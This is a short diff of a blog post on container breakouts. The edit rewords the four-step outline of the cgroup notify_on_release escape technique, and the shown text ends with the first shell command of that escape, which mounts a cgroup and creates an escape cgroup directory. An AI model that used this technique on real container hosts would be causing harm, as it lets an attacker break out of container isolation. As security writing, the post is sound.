NodyHub/blog/content/posts/2020-07-container-breakouts.md

 Here is just the quintessence of this approach:
 1. Create a new cgroup
-2. activate “callback” with `notify_on_release`
+2. Activate “callback” with `notify_on_release`
-3. create callback
+3. Create “callback”
-4. create ephemeral cgroup to trigger callback
+4. Create ephemeral process in new cgroup to trigger “callback”
 ```
 # mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/escape_cgroup